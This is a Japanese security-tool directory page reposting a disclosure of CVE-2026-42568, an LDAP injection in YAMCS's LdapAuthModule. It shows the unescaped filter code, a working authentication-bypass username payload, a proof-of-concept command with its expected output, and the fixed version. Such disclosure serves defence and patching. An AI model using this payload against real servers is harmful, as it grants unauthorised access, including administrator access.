Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-42568 — LDAPインジェクションの脆弱性がorg.yamcs.security.LdapAuthModuleに存在します。ユーザー名パラメータがRFC 4515エスケープなしで直接LDAP検索フィルタに挿入され、認証バイパスが可能になります。 | Kitploit
ツール/GitHubGitHub/ex-cal1bur/cve-2026-42568
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト認証学習と教育
GitHubex-cal1bur/cve-2026-42568

CVE-2026-42568

LDAPインジェクションの脆弱性がorg.yamcs.security.LdapAuthModuleに存在します。ユーザー名パラメータがRFC 4515エスケープなしで直接LDAP検索フィルタに挿入され、認証バイパスが可能になります。

リポジトリを見る
13ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-42568 — YAMCS LdapAuthModule におけるLDAPインジェクション

概要

org.yamcs.security.LdapAuthModule にLDAPインジェクションの脆弱性が存在します。ユーザー名パラメータがRFC 4515エスケープなしでLDAP検索フィルターに直接挿入されるため、認証回避が可能です。

フィールド値
CVECVE-2026-42568
深刻度MEDIUM
CWECWE-90: LDAPクエリにおける特殊要素の不適切な無効化
影響を受けるバージョンyamcs-core < 5.12.7(LDAP認証が設定されている場合)
修正バージョンyamcs-core 5.12.7
アドバイザリGHSA-cqh3-jg8p-336j

脆弱性の詳細

根本原因 (LdapAuthModule.java):

root@kitploit:~
var filter = userFilter.replace("{0}", username);
// username inserted directly — no RFC 4515 escaping

典型的な userFilter が (uid={0}) の場合、悪意あるユーザー名によりフィルター構造が破壊されます。

root@kitploit:~
Input:  *)(uid=*))(|(uid=*
Filter: (uid=*)(uid=*))(|(uid=*)
Result: Universal match — authentication bypassed

概念実証

root@kitploit:~
pip install requests
python3 poc.py http://localhost:8090

脆弱なインスタンスで期待される出力(LDAPが設定されている場合):

root@kitploit:~
[1] Universal bypass (any account)
     Username: *)(uid=*))(|(uid=*
     Password: anything
     Result:   HTTP 200
     [!!!] AUTHENTICATION BYPASSED
     [!!!] Token received: eyJhbGciOiJSUzI1NiJ9...

注記: この脆弱性は LdapAuthModule が設定されているYAMCSインスタンスにのみ影響します。デフォルトのインストールで組み込み認証を使用している場合は影響を受けません。

影響

LDAP認証が設定されている場合、認証されていない攻撃者がYAMCSサーバに到達可能であれば、認証を完全にバイパスし、管理者を含む任意のユーザーとしてアクセスを得ることができます。

修正

yamcs-core >= 5.12.7 にアップグレードしてください。

修正では、LDAPフィルターを構築する前にユーザー名にRFC 4515エスケープを適用します。

タイムライン

日付イベント
2026-05脆弱性が報告される
2026-05-26修正がyamcs-core 5.12.7でリリースされる
2026-05-26公開アドバイザリが公開される

研究者

Daniel Miranda Barcelona (Excal1bur)

  • GitHub: https://github.com/ex-cal1bur
  • LinkedIn: https://linkedin.com/in/daniel-miranda-barcelona
  • Blog: https://thedumpster.es
ツールをダウンロード